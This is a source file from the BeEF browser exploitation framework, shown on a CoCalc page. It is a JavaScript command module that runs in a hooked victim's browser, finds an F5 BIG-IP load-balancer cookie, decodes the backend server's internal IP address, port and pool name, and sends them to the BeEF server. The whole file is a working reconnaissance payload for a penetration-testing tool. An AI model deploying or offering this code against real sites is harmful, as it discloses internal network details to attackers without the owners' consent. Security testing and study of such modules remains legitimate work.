CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/network/ADC/f5_bigip_cookie_disclosure/command.js
¹⁸⁷³ views
1
//
2
// Copyright (c) 2006-2026Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
  var poolName = 'unknown';
10
  var routedDomain = 'unknown';
11
  var BIGipCookieName = '';
12
  var BIGipCookieValue = '';
13
  var backend = '';
14
  var result = '';
15

16
  function f5CookieDecode(cookieValue){
17
    var host;
18
    var port;
19

20
    if (cookieValue.match(/(\d{8,10})\.(\d{1,5})\./) !== null) {
21
      host = cookieValue.split('.')[0];
22
      host = parseInt(host);
23
      host = '' + (host & 0xFF) + '.' +
24
        ((host >> 8) & 0xFF) + '.' +
25
        ((host >> 16) & 0xFF) + '.' +
26
        ((host >> 24) & 0xFF);
27
      port = cookieValue.split('.')[1];
28
      port = parseInt(port);
29
      port = '' + (((port & 0xFF) << 8) | ((port >> 8) & 0xFF));
30
    } else if (cookieValue.match(/rd\d+o0{20}f{4}([a-f0-9]{8})o(\d{1,5})/) !== null) {
31
      host = cookieValue.split('ffff')[1].split('o')[0];
32
      host = parseInt(host.slice(0,2), 16) + '.' +
33
        parseInt(host.slice(2, 4), 16) + '.' +
34
        parseInt(host.slice(4, 6), 16) + '.' +
35
        parseInt(host.slice(6, 8), 16);
36
      port = cookieValue.split('ffff')[1].split('o')[1];
37
      port = parseInt(port).toString(16);
38
      port = parseInt(port.slice(2, 4) + port.slice(0, 2), 16);
39
    } else if (cookieValue.match(/vi([a-f0-9]{32})\.(\d{1,5})/) !== null) {
40
      host = cookieValue.split('.')[0].slice(2, -1);
41
      var decoded_host = '';
42
      for (var i = 0; i <  host.length; i += 4) {
43
        decoded_host += host.slice(i, i + 4) + ':';
44
      }
45
      host = decoded_host;
46
      port = cookieValue.split('.')[1];
47
      port = parseInt(port);
48
      port = '' + ( ((port & 0xFF) << 8) | ((port >> 8) & 0xFF) );
49
    } else if (cookieValue.match(/rd\d+o([a-f0-9]{32})o(\d{1,5})/) !== null) {
50
        host = cookieValue.split('o')[1];
51
        var decoded_host = '';
52
        for (var i = 0; i <  host.length; i += 4){
53
          decoded_host += host.slice(i,i+4) + ':';
54
        }
55
        host = decoded_host;
56
        port = cookieValue.split('o')[2];
57
    }
58

59
    return {
60
            host: host,
61
            port: port
62
    }
63
  }
64

65
  var m = document.cookie.match(/([~_\.\-\w\d]+)=(((?:\d+\.){2}\d+)|(rd\d+o0{20}f{4}\w+o\d{1,5})|(vi([a-f0-9]{32})\.(\d{1,5}))|(rd\d+o([a-f0-9]{32})o(\d{1,5})))(?:$|,|;|\s)/);
66

67
  if (m !== null) {
68
    BIGipCookieName = m[0].split('=')[0];
69
    BIGipCookieValue = m[0].split('=')[1];
70
    result = 'BigIP_cookie_name=' + BIGipCookieName;
71

72
    // Retrieve pool name via cookie name
73
    if (BIGipCookieName.match(/^BIGipServer/) !== null) {
74
      poolName = BIGipCookieName.split('BIGipServer')[1];
75
      result += '&pool_name=' + poolName;
76
    }
77

78
    // Routed domain is used
79
    if (BIGipCookieValue.match(/^rd/) !== null) {
80
      routedDomain = BIGipCookieValue.split('rd')[1].split('o')[0];
81
      result += '&routed_domain=' + routedDomain;
82
    }
83

84
    backend = f5CookieDecode(BIGipCookieValue);
85
    result += '&host=' + backend.host + '&port=' + backend.port;
86
  }
87
  else result = 'result=BigIP cookie not found'
88
  beef.net.send('<%= @command_url %>', <%= @command_id %>, result);
89
});
90

91
Product

Resources

Company
